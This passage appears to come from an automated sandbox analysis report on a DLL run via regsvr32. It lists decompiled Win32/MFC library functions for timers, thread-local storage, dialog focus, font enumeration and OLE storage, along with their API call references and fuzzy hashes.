                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002835f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028361
                                                                                                                0x10028367
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002836d
                                                                                                                0x10028372
                                                                                                                0x10028372
                                                                                                                0x00000000
                                                                                                                0x1002836d
                                                                                                                0x1002837b
                                                                                                                0x10028386
                                                                                                                0x10028447
                                                                                                                0x1002844d
                                                                                                                0x10028453
                                                                                                                0x1002838c
                                                                                                                0x10028391
                                                                                                                0x10028397
                                                                                                                0x10028397
                                                                                                                0x1002845a

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 100282DB
                                                                                                                • SetTimer.USER32(?,00000001,?,00000000), ref: 1002830C
                                                                                                                • PeekMessageA.USER32(?,?,00000373,00000374,00000001), ref: 1002833D
                                                                                                                • KillTimer.USER32 ref: 1002837B
                                                                                                                • WSASetLastError.WS2_32(00002714), ref: 10028391
                                                                                                                  • Part of subcall function 10023F14: __CxxThrowException@8.LIBCMT ref: 10023F28
                                                                                                                • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 100283CB
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100283E4
                                                                                                                • PostMessageA.USER32(?,00000373,00000000,00000000), ref: 1002844D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Peek$Timer$ErrorException@8H_prolog3_catchKillLastPostThrow
                                                                                                                • String ID:
                                                                                                                • API String ID: 892135707-0
                                                                                                                • Opcode ID: e854fb9c676dcc736765c35c5a51b0ec1f6297546a0ac8a5cc8c7894a8e45a7b
                                                                                                                • Instruction ID: 3ae8f8896b1ab264234c3be0e206ed9fbaa89b696c2c1eaf3d6fda6003435e7d
                                                                                                                • Opcode Fuzzy Hash: e854fb9c676dcc736765c35c5a51b0ec1f6297546a0ac8a5cc8c7894a8e45a7b
                                                                                                                • Instruction Fuzzy Hash: B6412BB590120AEFEB15DFA0EC84AAEBBB8FF08751F904529F955E6190D7309B41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1002D479(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t36;
                                                                                                                				void* _t39;
                                                                                                                				long _t41;
                                                                                                                				void* _t42;
                                                                                                                				long _t47;
                                                                                                                				void* _t53;
                                                                                                                				signed int _t55;
                                                                                                                				long* _t62;
                                                                                                                				struct _CRITICAL_SECTION* _t64;
                                                                                                                				void* _t65;
                                                                                                                				void* _t66;
                                                                                                                
                                                                                                                				_push(0x10);
                                                                                                                				E1003D219(E100541E3, __ebx, __edi, __esi);
                                                                                                                				_t62 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
                                                                                                                				_t64 = __ecx + 0x1c;
                                                                                                                				 *(_t66 - 0x14) = _t64;
                                                                                                                				EnterCriticalSection(_t64);
                                                                                                                				_t36 =  *(_t66 + 8);
                                                                                                                				if(_t36 <= 0 || _t36 >= _t62[3]) {
                                                                                                                					_push(_t64);
                                                                                                                				} else {
                                                                                                                					_t65 = TlsGetValue( *_t62);
                                                                                                                					if(_t65 == 0) {
                                                                                                                						 *(_t66 - 4) = 0;
                                                                                                                						_t39 = E1002D12C(0x10);
                                                                                                                						__eflags = _t39;
                                                                                                                						if(_t39 == 0) {
                                                                                                                							_t65 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							 *_t39 = 0x1005cd8c;
                                                                                                                							_t65 = _t39;
                                                                                                                						}
                                                                                                                						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
                                                                                                                						 *(_t65 + 8) = 0;
                                                                                                                						 *(_t65 + 0xc) = 0;
                                                                                                                						E1002D248( &(_t62[5]), _t65);
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						_t55 =  *(_t66 + 8);
                                                                                                                						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
                                                                                                                							L5:
                                                                                                                							if( *(_t65 + 0xc) != 0) {
                                                                                                                								_t41 = E10001710(_t62[3], 4);
                                                                                                                								_t53 = 2;
                                                                                                                								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
                                                                                                                							} else {
                                                                                                                								_t47 = E10001710(_t62[3], 4);
                                                                                                                								_pop(_t53);
                                                                                                                								_t42 = LocalAlloc(0, _t47);
                                                                                                                							}
                                                                                                                							_t76 = _t42;
                                                                                                                							if(_t42 == 0) {
                                                                                                                								LeaveCriticalSection( *(_t66 - 0x14));
                                                                                                                								_t42 = E1001726A(0, _t53, _t62, _t65, _t76);
                                                                                                                							}
                                                                                                                							 *(_t65 + 0xc) = _t42;
                                                                                                                							E1003BB70(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
                                                                                                                							 *(_t65 + 8) = _t62[3];
                                                                                                                							TlsSetValue( *_t62, _t65);
                                                                                                                							_t55 =  *(_t66 + 8);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t36 =  *(_t65 + 0xc);
                                                                                                                					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
                                                                                                                						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
                                                                                                                					}
                                                                                                                					_push( *(_t66 - 0x14));
                                                                                                                				}
                                                                                                                				LeaveCriticalSection();
                                                                                                                				return E1003D2BE(_t36);
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002D480
                                                                                                                • EnterCriticalSection.KERNEL32(?,00000010,1002D71C,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D491
                                                                                                                • TlsGetValue.KERNEL32 ref: 1002D4AF
                                                                                                                • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D4E3
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D54F
                                                                                                                • _memset.LIBCMT ref: 1002D56E
                                                                                                                • TlsSetValue.KERNEL32(?,00000000), ref: 1002D57F
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10023196,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D5A0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1891723912-0
                                                                                                                • Opcode ID: 49b338b92619fade77d70dedc170786a1666143629ac4fcdb68aaedf6b34e4d1
                                                                                                                • Instruction ID: b40f346a6f8e9777c4ee9c883b3a874f6e5d7ea1f702c753eedd98a8b764235f
                                                                                                                • Opcode Fuzzy Hash: 49b338b92619fade77d70dedc170786a1666143629ac4fcdb68aaedf6b34e4d1
                                                                                                                • Instruction Fuzzy Hash: 3C317E74400A26EFD710EF60EC8595ABBB4FF08354B61C62AF91697561CB71BE90CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10013270(void* __ecx) {
                                                                                                                				long _t18;
                                                                                                                				void* _t38;
                                                                                                                				void* _t52;
                                                                                                                
                                                                                                                				_t52 = __ecx;
                                                                                                                				_t18 = SendMessageA( *(__ecx + 0x1f8), 0xf0, 0, 0);
                                                                                                                				_t38 = _t52 + 0x184;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					E1001D39A(_t38, 0);
                                                                                                                					E1001D39A(_t52 + 0x130, 0);
                                                                                                                					E1001D39A(_t52 + 0xdc, 0);
                                                                                                                					E1001D39A(_t52 + 0x88, 0);
                                                                                                                					SendMessageA( *(_t52 + 0x1a4), 0xf1, 0, 0);
                                                                                                                					SendMessageA( *(_t52 + 0x150), 0xf1, 0, 0);
                                                                                                                					SendMessageA( *(_t52 + 0xfc), 0xf1, 0, 0);
                                                                                                                					return SendMessageA( *(_t52 + 0xa8), 0xf1, 0, 0);
                                                                                                                				} else {
                                                                                                                					E1001D39A(_t38, 1);
                                                                                                                					E1001D39A(_t52 + 0x130, 1);
                                                                                                                					E1001D39A(_t52 + 0xdc, 1);
                                                                                                                					E1001D39A(_t52 + 0x88, 1);
                                                                                                                					SendMessageA( *(_t52 + 0x1a4), 0xf1, 0, 0);
                                                                                                                					SendMessageA( *(_t52 + 0x150), 0xf1, 0, 0);
                                                                                                                					SendMessageA( *(_t52 + 0xfc), 0xf1, 0, 0);
                                                                                                                					return SendMessageA( *(_t52 + 0xa8), 0xf1, 0, 0);
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$EnableWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1554173715-0
                                                                                                                • Opcode ID: c2cec1cd44ac62786b436350435a1d8a5207680524d3cffbbe0ad7906cb20fd2
                                                                                                                • Instruction ID: f49919012713f552dc54165cbc2937a4fa5191b9d5ae3baf8d8e0e57b26a6ac4
                                                                                                                • Opcode Fuzzy Hash: c2cec1cd44ac62786b436350435a1d8a5207680524d3cffbbe0ad7906cb20fd2
                                                                                                                • Instruction Fuzzy Hash: 74211D353C0702BAF534F6748C93FE7A394AF94B00F114919B35AAE0D48EF0B5859765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1002B366(intOrPtr* __ecx, struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HWND__* _t22;
                                                                                                                				int _t26;
                                                                                                                				struct HWND__* _t32;
                                                                                                                				signed int _t33;
                                                                                                                				void* _t37;
                                                                                                                				intOrPtr* _t38;
                                                                                                                
                                                                                                                				_t38 = __ecx;
                                                                                                                				if(( *(__ecx + 0x58) & 0x01000020) == 0) {
                                                                                                                					L8:
                                                                                                                					return E10019B72(_t32, _t38, _t37, _t47);
                                                                                                                				}
                                                                                                                				_t37 = GetDlgItem;
                                                                                                                				_t32 = GetDlgItem( *(__ecx + 0x20), _a4);
                                                                                                                				if(_t32 == 0 || (GetWindowLongA(_t32, 0xfffffff0) & 0x10000000) == 0 || IsWindowEnabled(_t32) == 0) {
                                                                                                                					_t33 = 0;
                                                                                                                					while(1) {
                                                                                                                						_t22 = GetDlgItem( *(_t38 + 0x20),  *(0x1005c7b4 + _t33 * 4));
                                                                                                                						_a4 = _t22;
                                                                                                                						if((GetWindowLongA(_t22, 0xfffffff0) & 0x10000000) != 0 && IsWindowEnabled(_a4) != 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t33 = _t33 + 1;
                                                                                                                						_t47 = _t33 - 4;
                                                                                                                						if(_t33 < 4) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                					_t26 = IsWindowEnabled(GetFocus());
                                                                                                                					__eflags = _t26;
                                                                                                                					if(_t26 == 0) {
                                                                                                                						SetFocus(_a4);
                                                                                                                					}
                                                                                                                					return  *((intOrPtr*)( *_t38 + 0x110))(0x401,  *(0x1005c7b4 + _t33 * 4), _a8);
                                                                                                                				} else {
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 1002B382
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002B393
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 1002B39D
                                                                                                                • GetDlgItem.USER32(?), ref: 1002B3B3
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 1002B3BC
                                                                                                                • IsWindowEnabled.USER32(?), ref: 1002B3C9
                                                                                                                • GetFocus.USER32 ref: 1002B3E7
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 1002B3EE
                                                                                                                • SetFocus.USER32 ref: 1002B3FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Enabled$FocusItemLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 1558694495-0
                                                                                                                • Opcode ID: 3042f9cf57d70c34d1a5a14e4d33563231f7e979698b23aaf5880a16e59787f8
                                                                                                                • Instruction ID: 0fdb7c567a1c28fb62654af88f4cf1857230a4142f0354edeab786ff91b3be13
                                                                                                                • Opcode Fuzzy Hash: 3042f9cf57d70c34d1a5a14e4d33563231f7e979698b23aaf5880a16e59787f8
                                                                                                                • Instruction Fuzzy Hash: CA118C312047169FEB51DFA5FCC9A1B7AA8EF483A5F100629F682921B1EB71DD109E11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 74%
                                                                                                                			E1003835D(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                                                                				signed int _v8;
                                                                                                                				struct tagLOGFONTA _v68;
                                                                                                                				void* _v72;
                                                                                                                				char _v88;
                                                                                                                				intOrPtr _v100;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t15;
                                                                                                                				void* _t35;
                                                                                                                				void* _t38;
                                                                                                                				intOrPtr _t41;
                                                                                                                				void* _t42;
                                                                                                                				void* _t44;
                                                                                                                				struct HDC__* _t45;
                                                                                                                				void* _t46;
                                                                                                                				void* _t49;
                                                                                                                				signed int _t51;
                                                                                                                				signed int _t54;
                                                                                                                
                                                                                                                				_t42 = __edx;
                                                                                                                				_t38 = __ecx;
                                                                                                                				_t37 = __ebx;
                                                                                                                				_t51 = _t54;
                                                                                                                				_t15 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v8 = _t15 ^ _t51;
                                                                                                                				_t44 = __ecx;
                                                                                                                				_v72 = 0;
                                                                                                                				E1003BB70(__ecx,  &_v68, 0, 0x3c);
                                                                                                                				if(E1003D360(_t44) < 0x20) {
                                                                                                                					E1000B0F0(__ebx, _t44, 0, E1003F11F(_t42,  &(_v68.lfFaceName), 0x20, _t44));
                                                                                                                					_v68.lfCharSet = 1;
                                                                                                                					_v72 = 0;
                                                                                                                					_t45 = GetDC(0);
                                                                                                                					if(_t45 != 0) {
                                                                                                                						EnumFontFamiliesExA(_t45,  &_v68, E10038325,  &_v72, 0);
                                                                                                                						ReleaseDC(0, _t45);
                                                                                                                					}
                                                                                                                					_pop(_t46);
                                                                                                                					_pop(_t49);
                                                                                                                					return E1003B437(_v72, _t37, _v8 ^ _t51, _t42, _t46, _t49);
                                                                                                                				} else {
                                                                                                                					_push(_t51);
                                                                                                                					_push(_t38);
                                                                                                                					_v88 = 0x1006c938;
                                                                                                                					E1003D2F0( &_v88, 0x1006522c);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1003D1E6(E10052A8D, __ebx, _t44, 0);
                                                                                                                					_t41 = E1002D12C(0x104);
                                                                                                                					_v100 = _t41;
                                                                                                                					_t35 = 0;
                                                                                                                					_v88 = 0;
                                                                                                                					if(_t41 != 0) {
                                                                                                                						_t35 = E10022AE3(_t41);
                                                                                                                					}
                                                                                                                					return E1003D2BE(_t35);
                                                                                                                				}
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1003837D
                                                                                                                • _strlen.LIBCMT ref: 10038383
                                                                                                                • _strcpy_s.LIBCMT ref: 1003839C
                                                                                                                • GetDC.USER32(00000000), ref: 100383B2
                                                                                                                • EnumFontFamiliesExA.GDI32(00000000,?,10038325,?,00000000), ref: 100383CD
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 100383D5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumFamiliesFontRelease_memset_strcpy_s_strlen
                                                                                                                • String ID: MS UI Gothic
                                                                                                                • API String ID: 2896007982-1905310704
                                                                                                                • Opcode ID: 0949dc94256b216e0b4725ae6a45af698669781c0097452b3c5c03d86277a9c5
                                                                                                                • Instruction ID: 8f9736bb319d707899cce2883d6eceffab4a40fe6c555caaa6ff42b430ff71cf
                                                                                                                • Opcode Fuzzy Hash: 0949dc94256b216e0b4725ae6a45af698669781c0097452b3c5c03d86277a9c5
                                                                                                                • Instruction Fuzzy Hash: A501C876900228AFDB11DBA49C49DEF77BDEF49A00F100015F905E7241DB74BB018765
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E100302A0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t114;
                                                                                                                				intOrPtr _t118;
                                                                                                                				intOrPtr* _t119;
                                                                                                                				void* _t120;
                                                                                                                				intOrPtr* _t121;
                                                                                                                				void* _t122;
                                                                                                                				intOrPtr* _t125;
                                                                                                                				intOrPtr* _t127;
                                                                                                                				void _t129;
                                                                                                                				intOrPtr* _t131;
                                                                                                                				long _t134;
                                                                                                                				void* _t135;
                                                                                                                				void* _t136;
                                                                                                                				void* _t137;
                                                                                                                				void _t139;
                                                                                                                				void _t141;
                                                                                                                				void* _t143;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				void* _t148;
                                                                                                                				void _t149;
                                                                                                                				void* _t151;
                                                                                                                				intOrPtr* _t153;
                                                                                                                				void* _t154;
                                                                                                                				void _t158;
                                                                                                                				void* _t159;
                                                                                                                				void _t161;
                                                                                                                				intOrPtr* _t163;
                                                                                                                				void* _t168;
                                                                                                                				intOrPtr* _t170;
                                                                                                                				intOrPtr* _t172;
                                                                                                                				intOrPtr* _t174;
                                                                                                                				void* _t175;
                                                                                                                				intOrPtr _t186;
                                                                                                                				intOrPtr* _t206;
                                                                                                                				void* _t210;
                                                                                                                				intOrPtr* _t219;
                                                                                                                				intOrPtr* _t221;
                                                                                                                				void* _t222;
                                                                                                                				void* _t224;
                                                                                                                
                                                                                                                				_push(0x68);
                                                                                                                				_t114 = E1003D1E6(E100544D8, __ebx, __edi, __esi);
                                                                                                                				_t221 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
                                                                                                                				_t219 = __ecx + 0x50;
                                                                                                                				 *(_t224 - 0x10) = 0;
                                                                                                                				if( *_t219 != 0) {
                                                                                                                					L2:
                                                                                                                					 *(_t224 + 8) = 0;
                                                                                                                					 *(_t224 - 0x14) = 0;
                                                                                                                					 *((intOrPtr*)(_t224 + 0x14)) = 0;
                                                                                                                					E1002EBD2(_t221, _t221 + 0x40);
                                                                                                                					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
                                                                                                                					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
                                                                                                                					if(_t118 != 0) {
                                                                                                                						L5:
                                                                                                                						_t222 =  *(_t224 + 0xc);
                                                                                                                						if(_t222 == 0) {
                                                                                                                							__eflags =  *(_t224 + 0x10);
                                                                                                                							if( *(_t224 + 0x10) != 0) {
                                                                                                                								L16:
                                                                                                                								_t119 =  *_t219;
                                                                                                                								_t210 = _t224 - 0x14;
                                                                                                                								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x1005faa4, _t210);
                                                                                                                								__eflags = _t120;
                                                                                                                								if(_t120 < 0) {
                                                                                                                									L43:
                                                                                                                									if( *(_t224 - 0x10) >= 0) {
                                                                                                                										L46:
                                                                                                                										_t121 =  *((intOrPtr*)(_t224 + 0x14));
                                                                                                                										if(_t121 != 0) {
                                                                                                                											 *((intOrPtr*)( *_t121 + 8))(_t121);
                                                                                                                										}
                                                                                                                										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
                                                                                                                											 *(_t224 - 0x10) = 1;
                                                                                                                										}
                                                                                                                										_t122 =  *(_t224 - 0x10);
                                                                                                                										L52:
                                                                                                                										return E1003D2BE(_t122);
                                                                                                                									}
                                                                                                                									L44:
                                                                                                                									_t125 =  *_t219;
                                                                                                                									if(_t125 != 0) {
                                                                                                                										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
                                                                                                                										_t127 =  *_t219;
                                                                                                                										 *((intOrPtr*)( *_t127 + 8))(_t127);
                                                                                                                										 *_t219 = 0;
                                                                                                                									}
                                                                                                                									goto L46;
                                                                                                                								}
                                                                                                                								__eflags = _t222;
                                                                                                                								if(_t222 != 0) {
                                                                                                                									__eflags =  *(_t224 + 0x10);
                                                                                                                									if( *(_t224 + 0x10) == 0) {
                                                                                                                										 *(_t224 - 0x10) = 0x8000ffff;
                                                                                                                										L37:
                                                                                                                										_t129 =  *(_t224 - 0x14);
                                                                                                                										L38:
                                                                                                                										 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                                                                                										L39:
                                                                                                                										if( *(_t224 - 0x10) < 0) {
                                                                                                                											goto L44;
                                                                                                                										}
                                                                                                                										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
                                                                                                                											_t186 =  *((intOrPtr*)(_t224 - 0x24));
                                                                                                                											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
                                                                                                                												_t131 =  *_t219;
                                                                                                                												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L43;
                                                                                                                									}
                                                                                                                									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
                                                                                                                									__eflags = _t210;
                                                                                                                									 *(_t224 - 0x2c) = _t134;
                                                                                                                									if(__eflags > 0) {
                                                                                                                										L29:
                                                                                                                										 *(_t224 - 0x10) = 0x8007000e;
                                                                                                                										 *(_t224 + 0x10) = 0;
                                                                                                                										L30:
                                                                                                                										__eflags =  *(_t224 + 0x10);
                                                                                                                										 *(_t224 - 0x1c) = 0;
                                                                                                                										if( *(_t224 + 0x10) == 0) {
                                                                                                                											goto L37;
                                                                                                                										}
                                                                                                                										_t135 = _t224 - 0x1c;
                                                                                                                										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
                                                                                                                										__eflags = _t135;
                                                                                                                										 *(_t224 - 0x10) = _t135;
                                                                                                                										if(_t135 < 0) {
                                                                                                                											goto L37;
                                                                                                                										}
                                                                                                                										_t136 = _t224 - 0x18;
                                                                                                                										 *(_t224 - 0x18) = 0;
                                                                                                                										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
                                                                                                                										__eflags = _t136;
                                                                                                                										 *(_t224 - 0x10) = _t136;
                                                                                                                										if(_t136 >= 0) {
                                                                                                                											_t139 =  *(_t224 - 0x14);
                                                                                                                											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
                                                                                                                											_t141 =  *(_t224 - 0x18);
                                                                                                                											 *((intOrPtr*)( *_t141 + 8))(_t141);
                                                                                                                										}
                                                                                                                										_t137 =  *(_t224 - 0x1c);
                                                                                                                										L35:
                                                                                                                										 *((intOrPtr*)( *_t137 + 8))(_t137);
                                                                                                                										goto L37;
                                                                                                                									}
                                                                                                                									if(__eflags < 0) {
                                                                                                                										L26:
                                                                                                                										_t143 = GlobalAlloc(0, _t134);
                                                                                                                										__eflags = _t143;
                                                                                                                										 *(_t224 + 0x10) = _t143;
                                                                                                                										if(_t143 == 0) {
                                                                                                                											goto L29;
                                                                                                                										}
                                                                                                                										_t144 = GlobalLock(_t143);
                                                                                                                										__eflags = _t144;
                                                                                                                										if(_t144 == 0) {
                                                                                                                											goto L29;
                                                                                                                										}
                                                                                                                										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
                                                                                                                										GlobalUnlock( *(_t224 + 0x10));
                                                                                                                										goto L30;
                                                                                                                									}
                                                                                                                									__eflags = _t134 - 0xffffffff;
                                                                                                                									if(_t134 >= 0xffffffff) {
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                								_t147 = _t224 + 0xc;
                                                                                                                								 *(_t224 + 0xc) = 0;
                                                                                                                								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
                                                                                                                								__eflags = _t147;
                                                                                                                								 *(_t224 - 0x10) = _t147;
                                                                                                                								if(_t147 < 0) {
                                                                                                                									goto L37;
                                                                                                                								}
                                                                                                                								_t148 = _t224 + 0x10;
                                                                                                                								 *(_t224 + 0x10) = 0;
                                                                                                                								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
                                                                                                                								__eflags = _t148;
                                                                                                                								 *(_t224 - 0x10) = _t148;
                                                                                                                								if(_t148 >= 0) {
                                                                                                                									_t149 =  *(_t224 - 0x14);
                                                                                                                									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
                                                                                                                									_t151 =  *(_t224 + 0x10);
                                                                                                                									 *((intOrPtr*)( *_t151 + 8))(_t151);
                                                                                                                								}
                                                                                                                								_t137 =  *(_t224 + 0xc);
                                                                                                                								goto L35;
                                                                                                                							}
                                                                                                                							L11:
                                                                                                                							_t153 =  *_t219;
                                                                                                                							_t213 = _t224 + 8;
                                                                                                                							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x1005fb34, _t224 + 8);
                                                                                                                							__eflags = _t154;
                                                                                                                							if(_t154 < 0) {
                                                                                                                								goto L16;
                                                                                                                							} else {
                                                                                                                								__eflags = _t222;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									E10020058(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
                                                                                                                									 *(_t224 - 4) = 0;
                                                                                                                									E100359F9(_t224 - 0x2c, _t224 - 0x74);
                                                                                                                									_t158 =  *(_t224 + 8);
                                                                                                                									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
                                                                                                                									_t47 = _t224 - 4;
                                                                                                                									 *_t47 =  *(_t224 - 4) | 0xffffffff;
                                                                                                                									__eflags =  *_t47;
